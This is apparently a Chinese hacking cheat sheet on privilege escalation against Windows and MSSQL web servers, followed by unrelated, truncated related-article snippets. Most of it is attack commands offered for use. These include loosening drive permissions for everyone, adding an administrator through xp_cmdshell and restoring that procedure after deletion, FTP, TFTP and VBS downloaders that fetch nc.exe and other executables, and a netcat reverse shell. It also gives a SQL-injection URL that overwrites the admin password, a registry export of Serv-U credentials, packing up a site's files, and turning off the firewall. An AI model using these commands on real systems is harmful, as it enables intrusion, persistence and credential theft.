提权总结整理贴_安全教程

y-2k 的 

 
权限设置
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
cacls d:\website /g everyone /e /t授与完全控制
cacls d:\website /r everyone /e /t取消完全控制
SA加系统用户
exec master.dbo.xp_cmdshell 'net user admin admin /add'

exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

恢复扩散
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

如果恢复不了的解释:
因为管理员是直接删除dll文件,而没删除存储过程,你这样恢复肯定是提示存储过程已存在了。你要先删除存储过程,use master
EXEC sp_dropextendedproc 'xp_cmdshell'

然后上传xplog70.dll到某个目录,例如C盘根目录,然后执行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存储过程执行系统指令了。

MB的没想到网关都能用NB这样设..落伍啦.落伍啦
把他设置成网关看看行不行.在NBSI执行命令那里输入:echo interface ip >ip.txt
echo set address "Backup" static 10.90.90.157 255.255.255.0 10.90.90.14 1 >>ip.txt
netsh exec ip.txt
这样就把网关设置为10.90.90.14了,然后我们ipconfig看看是不是有网关了,

echo interface ip >1.txt
echo set address "本地连接" static 192.168.1.2 255.255.255.0 192.168.1 254 1 >>1.txt
netsh exec 1.txt

address"本地连接的名称" 可以用ipconfig得到. static IP地址 子网掩码网关地址。
好了现在我PING下163看看能不能PING通,如图8

命令行FTP下载文件
echo open ip >11.txt
echo user >>11.txt
echo pass >>11.txt
echo get nc.exe >>11.txt
echo bye >>11.txt
ftp -s:11.txt

NC做反弹SHELL
在本地监听1234端口 nc -vv -l -p 1234

然后在NBSI执行命令那里nc -e cmd.exe ip 1234

改密码地
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]

查看系统在线用户
query user
注销用户
logoff
D:\web\rar.exe a -k -r -s -m1 D:\web\zhu.rar D:\web\
把站点打包到zhu.rar里,

参数说明:

a 添加文件到压缩文件中

-k 锁定压缩文件

-s产生固体存档,这样可以增大压缩比

-r包括子目录

-m1 设置压缩比

-m0 存储 添加到压缩文件时不压缩文件。
-m1 最快 使用最快方式(低压缩)
-m2 较快 使用快速压缩方式
-m3 标准 使用标准(默认)压缩方式
-m4 较好 使用较好压缩方式(较好压缩,但是慢)
-m5 最好 使用最大压缩方式(最好的压缩,但是最慢

直接 D:\web\rar.exe a -r D:\web\zhu.rar D:\web\ 效果一样

exec xp_cmdshell 'echo 内容 >>绝对路径'

sc stop MSSQLSERVER
sc config MSSQLSERVER start= disabled

导SERV-U用户.和密码,不过现在版本密码加密了``

regedit /e "D:\hosting\wwwroot\systones_com\htdocs\su.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"

导入是regedit /s xx.reg

端口:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

tftp -i serverip get xx.exe

TFTP –I 127.0.0.1 get common.dll c:\common.dll

VBS
--
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/u.txt",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\jp.exe",2

VPN
关防火和Application Layer Gateway Service

3389登陆
mstsc /console /v:IP:终端端口

时间: 2024-10-14 13:23:29

提权总结整理贴_安全教程的相关文章

有关表格边框的css语法整理(1)_基础教程

我们知道Dreamweaver在表格制作方面做得非常出色,但是在某些时候还是必须结合css才能达到一些特定效果,下面我们先把有关表格边框的css语法整理出来,然后另外介绍怎样用css美化表格的边框.  有关表格边框的css语法 具体内容包括:上边框宽度.右边框宽度.下边框宽度.左边框宽度.边框宽度.边框颜色.边框样式.上边框.下边框.左边框.右边框.边框.宽度.高度.有关标签等.  1.上边框宽度 语法: border-top-width: <值> 允许值: thin | medium | t

linux 2.6内核本地提权

It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned. Exploitation w

GCC编译漏洞_普通用户提权root

#!/bin/bash #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> #writer:ColinTao #function: YOUR UID WILL BE

虚拟主机封杀webshell提权!!!!!!!!!!_服务器

 1.为了打造一个安全的虚拟主机,在asp+SQL环境下,我们要做的是封杀ASP webshell.封杀serv-u提权漏洞和SQL注入的威胁 2.默认安装的win主机上webshell功能十分强大,我们要封杀webshell的哪些功能 也就是不让webshell查看系统服务信息,执行cmd命令和略览文件目录,我们要实现的功能是每个用户只能访问自己的目录,而且可以用FSO等ASP组件,在这里我以海洋木马和win200为例给大家演示一下.好多资料都是网上收集而来,在这表示感谢. 3.现在我们先设置

mysql 提权问题做到这创建函数出现错误

问题描述 mysql 提权问题做到这创建函数出现错误 mysql版本5.0.22 按照网上的教程进行提权操作但做到 create function sys_eval returns string soname "lib_mysqludf_sys.so": 这一步的时候出现错误 create function sys_eval returns string soname "lib_mysqludf_sys.so"; ERROR 1126 (HY000): Can't

绿盟科技网络安全威胁周报2017.08 关注Linux本地提权漏洞 CVE-2017-6074

绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-08,绿盟科技漏洞库本周新增42条,其中高危22条.本次周报建议大家关注 Linux本地提权漏洞 CVE-2017-6074 .目前漏洞修复补丁已出,强烈建议用户对受影响的系统进行更新.. 焦点漏洞 Linux本地提权漏洞 NSFOCUS ID  35977 CVE ID  CVE-2017-6074 受影响版本 Redhat.Debian.OpenSUSE和Ubuntu等主流Linux发行版本 漏洞点评 Linux内核的DCCP协议实现

Android adb setuid提权漏洞

去年的Android adb setuid提权漏洞被用于各类root刷机,漏洞发现人Sebastian Krahmer公布的利用工具RageAgainstTheCage(rageagainstthecage-arm5.bin)被用于z4root等提权工具.Trojan.Android.Rootcager等恶意代码之中.下面我们来分析这一漏洞的产生原因. The Android Exploid Crew小组在后来发布了一份PoC代码:rageagainstthecage.c.从这份代码开始着手.

让你变成ASP木马高手_安全教程

1.名称:如何制作图片ASP木马 (可显示图片)  建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->  找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为  了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入  <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(

Ring的权限提升21中方法_安全教程

作者:Nah 文章来源:http://blog.77169.com/more.asp?name=atan19a&id=6866 以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过 的.本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结.希望对朋友有帮助! 1.radmin连接法 条件是你权限够大,对方连防火墙也没有.封装个radmin上去,运行,开对方端口,然后radmin上去 .本人从来米成功过.,端口到是给对方打开了. 2.pcanywhe